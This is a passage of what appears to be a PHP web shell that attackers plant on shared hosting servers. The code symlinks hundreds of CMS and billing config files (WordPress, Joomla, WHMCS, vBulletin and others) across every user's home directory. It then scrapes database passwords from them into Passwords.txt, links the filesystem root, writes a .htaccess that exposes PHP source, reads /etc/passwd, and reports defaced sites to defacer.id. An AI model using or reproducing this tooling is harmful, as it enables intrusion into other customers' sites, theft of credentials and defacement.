1967. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
1968. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
1969. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
1970. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
1971. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
1972. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
1973. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
1974. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
1975.  
1976. //Home4
1977.  
1978. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1979. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1980. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1981. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1982. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1983. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1984. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1985. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1986. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1987. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1988. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1989. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1990. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1991. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1992. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1993. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1994. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1995. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1996. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1997. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1998. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1999. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
2000. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
2001. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
2002. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
2003. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
2004. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
2005. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
2006. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
2007. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
2008. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
2009. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
2010. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
2011. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
2012. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
2013. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
2014. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
2015. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
2016. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
2017. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
2018. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
2019. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
2020. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
2021. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
2022. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
2023. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
2024. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
2025. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
2026. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
2027. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2028. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2029. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
2030. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
2031. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
2032. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
2033. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
2034. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
2035. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
2036. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
2037. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
2038. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
2039. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
2040. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
2041. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
2042. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
2043. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
2044. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
2045. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
2046. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
2047. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
2048. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
2049. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
2050. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
2051. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
2052. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
2053. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
2054. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
2055. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
2056. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
2057. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
2058. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
2059. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
2060. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
2061. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
2062. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
2063. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
2064. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
2065. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
2066. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
2067. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
2068. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
2069. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
2070. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
2071. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
2072. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
2073. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
2074. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
2075. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
2076. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
2077. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2078. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2079. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2080. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
2081. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
2082. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
2083. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
2084. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
2085. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
2086. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
2087. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
2088. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
2089. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
2090. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
2091. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
2092. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
2093. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
2094. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
2095. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
2096. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
2097. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
2098. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
2099. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
2100. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
2101. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
2102. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
2103. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
2104. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2105. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2106. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2107. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
2108. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
2109. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
2110. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
2111. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
2112. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
2113. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
2114. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
2115. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
2116. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
2117. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
2118. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
2119. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
2120. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
2121. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
2122. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
2123. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
2124. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
2125. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
2126. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
2127. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
2128. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
2129. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
2130. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
2131. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
2132. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
2133. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
2134. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
2135. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
2136. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
2137. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
2138. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
2139. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
2140. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
2141. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
2142. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
2143. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
2144. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
2145. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
2146. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
2147. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
2148. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
2149. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
2150. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
2151. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
2152. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
2153. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
2154. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
2155. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
2156. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
2157. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
2158.  
2159. }
2160.  
2161. //password grab
2162.  
2163. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
2164. {
2165.  
2166. $ar0=explode($marqueurDebutLien, $text);
2167. $ar1=explode($marqueurFinLien, $ar0[1]);
2168. $ar=trim($ar1[0]);
2169. return $ar;
2170. }
2171.  
2172. $ffile=fopen('Passwords.txt','a+');
2173.  
2174.  
2175. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/chonx_symconf/";
2176. $re=$r;
2177. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
2178.  
2179. $users=file("/etc/passwd");
2180. foreach($users as $user)
2181. {
2182.  
2183. $str=explode(":",$user);
2184. $usersss=$str[0];
2185. foreach($confi as $co)
2186. {
2187.  
2188.  
2189. $uurl=$re.$usersss.$co;
2190. $uel=$uurl;
2191.  
2192. $ch = curl_init();
2193.  
2194. curl_setopt($ch, CURLOPT_URL, $uel);
2195. curl_setopt($ch, CURLOPT_HEADER, 1);
2196. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2197. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2198. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
2199. $result['EXE'] = curl_exec($ch);
2200. curl_close($ch);
2201. $uxl=$result['EXE'];
2202.  
2203.  
2204. if($uxl && preg_match('/table_prefix/i',$uxl))
2205. {
2206.  
2207. //Wordpress
2208.  
2209. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
2210. if(!empty($dbp))
2211. $pass=$dbp."\n";
2212. fwrite($ffile,$pass);
2213.  
2214. }
2215. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
2216. {
2217.  
2218. //WHMCS
2219.  
2220. $dbp=entre2v2($uxl,"db_password = '","';");
2221. if(!empty($dbp))
2222. $pass=$dbp."\n";
2223. fwrite($ffile,$pass);
2224.  
2225. }
2226.  
2227.  
2228. elseif($uxl && preg_match('/dbprefix/i',$uxl))
2229. {
2230.  
2231. //Joomla
2232.  
2233. $db=entre2v2($uxl,"password = '","';");
2234. if(!empty($db))
2235. $pass=$db."\n";
2236. fwrite($ffile,$pass);
2237. }
2238. elseif($uxl && preg_match('/admincpdir/i',$uxl))
2239. {
2240.  
2241. //Vbulletin
2242.  
2243. $db=entre2v2($uxl,"password'] = '","';");
2244. if(!empty($db))
2245. $pass=$db."\n";
2246. fwrite($ffile,$pass);
2247.  
2248. }
2249. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
2250. {
2251.  
2252. //Other
2253.  
2254. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
2255. if(!empty($db))
2256. $pass=$db."\n";
2257. fwrite($ffile,$pass);
2258. }
2259. elseif($uxl && preg_match('/dbpass/i',$uxl))
2260. {
2261.  
2262. //Other
2263.  
2264. $db=entre2v2($uxl,"dbpass = '","';");
2265. if(!empty($db))
2266. $pass=$db."\n";
2267. fwrite($ffile,$pass);
2268. }
2269. elseif($uxl && preg_match('/dbpass/i',$uxl))
2270. {
2271.  
2272. //Other
2273.  
2274. $db=entre2v2($uxl,"dbpass = '","';");
2275. if(!empty($db))
2276. $pass=$db."\n";
2277. fwrite($ffile,$pass);
2278.  
2279. }
2280. elseif($uxl && preg_match('/dbpass/i',$uxl))
2281. {
2282.  
2283. //Other
2284.  
2285. $db=entre2v2($uxl,"dbpass = \"","\";");
2286. if(!empty($db))
2287. $pass=$db."\n";
2288. fwrite($ffile,$pass);
2289. }
2290.  
2291.  
2292. }
2293. }
2294. echo "<center>
2295. <a href=\"chonx_symconf/root/\">Root Server</a>
2296. <br><a href=\"chonx_symconf/Passwords.txt\">Passwords</a>
2297. <br><a href=\"chonx_symconf/\">Configurations</a></center>";
2298. }
2299. else
2300. {
2301. echo "<center>
2302. <form method=\"POST\">
2303. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
2304. $file = '/etc/passwd';
2305. $read = @fopen($file, 'r');
2306. if ($read){
2307. $body = @fread($read, @filesize($file));
2308. echo "".htmlentities($body)."";
2309. }
2310. elseif(!$read)
2311. {
2312. $read = @show_source($file) ;
2313. }
2314. elseif(!$read)
2315. {
2316. $read = @highlight_file($file);
2317. }
2318. elseif(!$read)
2319. {
2320. for($uid=0;$uid<1000;$uid++)
2321. {
2322. $ara = posix_getpwuid($uid);
2323. if (!empty($ara))
2324. {
2325. while (list ($key, $val) = each($ara))
2326. {
2327. print "$val:";
2328. }
2329. print "\n";
2330. }}}
2331.  
2332. flush();
2333.  
2334. echo "</textarea>
2335. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
2336. </form></center>";
2337. }
2338. }
2339. }
2340. elseif($_GET['do'] == 'symlink') {
2341. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
2342. $d0mains = @file("/etc/named.conf");
2343. ##httaces
2344. if($d0mains){
2345. @mkdir("chonx_sym",0777);
2346. @chdir("chonx_sym");
2347. @exe("ln -s / root");
2348. $file3 = 'Options Indexes FollowSymLinks
2349. DirectoryIndex janchonx.htm
2350. AddType text/plain .php
2351. AddHandler text/plain .php
2352. Satisfy Any';
2353. $fp3 = fopen('.htaccess','w');
2354. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2355. echo "
2356. <table align=center border=1 style='width:60%;border-color:#333333;'>
2357. <tr>
2358. <td align=center><font size=2>S. No.</font></td>
2359. <td align=center><font size=2>Domains</font></td>
2360. <td align=center><font size=2>Users</font></td>
2361. <td align=center><font size=2>Symlink</font></td>
2362. </tr>";
2363. $dcount = 1;
2364. foreach($d0mains as $d0main){
2365. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
2366. flush();
2367. if(strlen(trim($domains[1][0])) > 2){
2368. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2369. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
2370. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
2371. <td>".$user['name']."</td>
2372. <td><a href='$full/chonx_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
2373. flush();
2374. $dcount++;}}}
2375. echo "</table>";
2376. }else{
2377. $TEST=@file('/etc/passwd');
2378. if ($TEST){
2379. @mkdir("chonx_sym",0777);
2380. @chdir("chonx_sym");
2381. exe("ln -s / root");
2382. $file3 = 'Options Indexes FollowSymLinks
2383. DirectoryIndex janchonx.htm
2384. AddType text/plain .php
2385. AddHandler text/plain .php
2386. Satisfy Any';
2387. $fp3 = fopen('.htaccess','w');
2388. $fw3 = fwrite($fp3,$file3);
2389. @fclose($fp3);
2390. echo "
2391. <table align=center border=1><tr>
2392. <td align=center><font size=3>S. No.</font></td>
2393. <td align=center><font size=3>Users</font></td>
2394. <td align=center><font size=3>Symlink</font></td></tr>";
2395. $dcount = 1;
2396. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
2397. while(!feof($file)){
2398. $s = fgets($file);
2399. $matches = array();
2400. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2401. $matches = str_replace("home/","",$matches[1]);
2402. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2403. continue;
2404. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
2405. <td align=center><font class=txt>" . $matches . "</td>";
2406. echo "<td align=center><font class=txt><a href=$full/chonx_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2407. $dcount++;}fclose($file);
2408. echo "</table>";}else{if($os != "Windows"){@mkdir("chonx_sym",0777);@chdir("chonx_sym");@exe("ln -s / root");$file3 = '
2409. Options Indexes FollowSymLinks
2410. DirectoryIndex janchonx.htm
2411. AddType text/plain .php
2412. AddHandler text/plain .php
2413. Satisfy Any
2414. ';
2415. $fp3 = fopen('.htaccess','w');
2416. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2417. echo "
2418. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
2419. <table align=center border=1><tr>
2420. <td align=center><font size=3>ID</font></td>
2421. <td align=center><font size=3>Users</font></td>
2422. <td align=center><font size=3>Symlink</font></td></tr>";
2423. $temp = "";$val1 = 0;$val2 = 1000;
2424. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
2425. if ($uid)$temp .= join(':',$uid)."\n";}
2426. echo '<br/>';$temp = trim($temp);$file5 =
2427. fopen("test.txt","w");
2428. fputs($file5,$temp);
2429. fclose($file5);$dcount = 1;$file =
2430. fopen("test.txt", "r") or exit("Unable to open file!");
2431. while(!feof($file)){$s = fgets($file);$matches = array();
2432. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
2433. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2434. continue;
2435. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
2436. <td align=center><font class=txt>" . $matches . "</td>";
2437. echo "<td align=center><font class=txt><a href=$full/chonx_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2438. $dcount++;}
2439. fclose($file);
2440. echo "</table></div></center>";unlink("test.txt");
2441. } else
2442. echo "<center><font size=3>Cannot create Symlink</font></center>";
2443. }
2444. }
2445. }
2446. elseif($_GET['do'] == 'defacerid') {
2447. echo "<center><form method='post'>
2448. <u>Defacer</u>: <br>
2449. <input type='text' name='hekel' size='50' value='Achon666ju5t'><br>
2450. <u>Team</u>: <br>
2451. <input type='text' name='tim' size='50' value='Extreme Crew'><br>
2452. <u>Domains</u>: <br>
2453. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
2454. <input type='submit' name='go' value='Submit' style='width: 450px;'>
2455. </form>";
2456. $site = explode("\r\n", $_POST['sites']);
2457. $go = $_POST['go'];
2458. $hekel = $_POST['hekel'];
2459. $tim = $_POST['tim'];
2460. if($go) {
2461. foreach($site as $sites) {
2462. $zh = $sites;
2463. $form_url = "https://www.defacer.id/notify";
2464. $data_to_post = array();
2465. $data_to_post['attacker'] = "$hekel";
2466. $data_to_post['team'] = "$tim";
2467. $data_to_post['poc'] = 'SQL Injection';
2468. $data_to_post['url'] = "$zh";
2469. $curl = curl_init();
2470. curl_setopt($curl,CURLOPT_URL, $form_url);
2471. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
2472. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
2473. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
